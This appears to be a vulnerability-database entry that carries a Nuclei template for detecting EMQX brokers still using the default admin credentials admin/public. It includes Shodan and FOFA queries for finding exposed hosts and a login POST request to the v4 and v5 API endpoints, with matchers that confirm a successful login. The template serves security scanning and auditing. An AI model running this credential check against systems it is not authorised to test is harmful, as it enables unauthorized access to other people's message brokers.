emqx-default-login: Emqx Default Admin Login

日期: 2025-08-01 | 影响软件: Emqx | POC: 已公开

漏洞描述

Emqx default admin credentials were discovered. shodan: http.favicon.hash:"-670975485" fofa: icon_hash="-670975485"

PoC代码[已公开]

id: emqx-default-login

info:
  name: Emqx Default Admin Login
  author: For3stCo1d
  severity: high
  description: Emqx default admin credentials were discovered.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:"-670975485"
  tags: emqx,default-login,vuln

variables:
  username: "admin"
  password: "public"

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    attack: clusterbomb
    payloads:
      path:
        - "/api/v4/auth"
        - "/api/v5/login"

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - body == "{\"code\":0}"
          - status_code == 200
        condition: and

      - type: dsl
        dsl:
          - contains(body, "\"token\":") && contains(body, "\"license\":")
          - contains(content_type, 'application/json')
          - status_code == 200
        condition: and
# digest: 4a0a004730450221009ff107065f18c162d30b03d24387b2b0cc5a5bced13f53b652b1bc60d01d52d702207be130bcc77dad26716772ae1cc982b2dffcda4f474294e79f13afb5cec2c02d:922c64590222798bb761d5b6d8e72950